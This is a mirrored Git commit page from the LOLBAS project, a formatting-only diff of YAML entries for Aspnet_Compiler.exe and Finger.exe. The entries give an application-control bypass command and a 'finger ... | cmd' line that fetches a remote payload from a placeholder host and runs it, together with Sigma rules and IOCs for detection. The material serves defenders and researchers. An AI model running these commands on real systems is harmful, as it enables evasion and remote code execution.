mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 20:22:24 +02:00
Fixing file formating.
This commit is contained in:
BIN
yml/OSBinaries/.AppInstaller.yml.swp
Normal file
BIN
yml/OSBinaries/.AppInstaller.yml.swp
Normal file
Binary file not shown.
@@ -1,27 +1,27 @@
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
|
@@ -1,30 +1,30 @@
|
||||
---
|
||||
Name: Finger.exe
|
||||
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||||
Author: Ruben Revuelta
|
||||
Created: 2021-08-30
|
||||
Commands:
|
||||
- Command: finger user@example.host.com | more +2 | cmd
|
||||
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
|
||||
Usecase: Download malicious payload
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\finger.exe
|
||||
- Path: c:\windows\syswow64\finger.exe
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
|
||||
- IOC: finger.exe should not be run on a normal workstation.
|
||||
- IOC: finger.exe connecting to external resources.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/997340270273409024
|
||||
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||||
Acknowledgement:
|
||||
- Person: Ruben Revuelta (MAPFRE CERT)
|
||||
Handle: '@rubn_RB'
|
||||
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
Name: Finger.exe
|
||||
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||||
Author: Ruben Revuelta
|
||||
Created: 2021-08-30
|
||||
Commands:
|
||||
- Command: finger user@example.host.com | more +2 | cmd
|
||||
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
|
||||
Usecase: Download malicious payload
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\finger.exe
|
||||
- Path: c:\windows\syswow64\finger.exe
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
|
||||
- IOC: finger.exe should not be run on a normal workstation.
|
||||
- IOC: finger.exe connecting to external resources.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/997340270273409024
|
||||
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||||
Acknowledgement:
|
||||
- Person: Ruben Revuelta (MAPFRE CERT)
|
||||
Handle: '@rubn_RB'
|
||||
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
|
Reference in New Issue
Block a user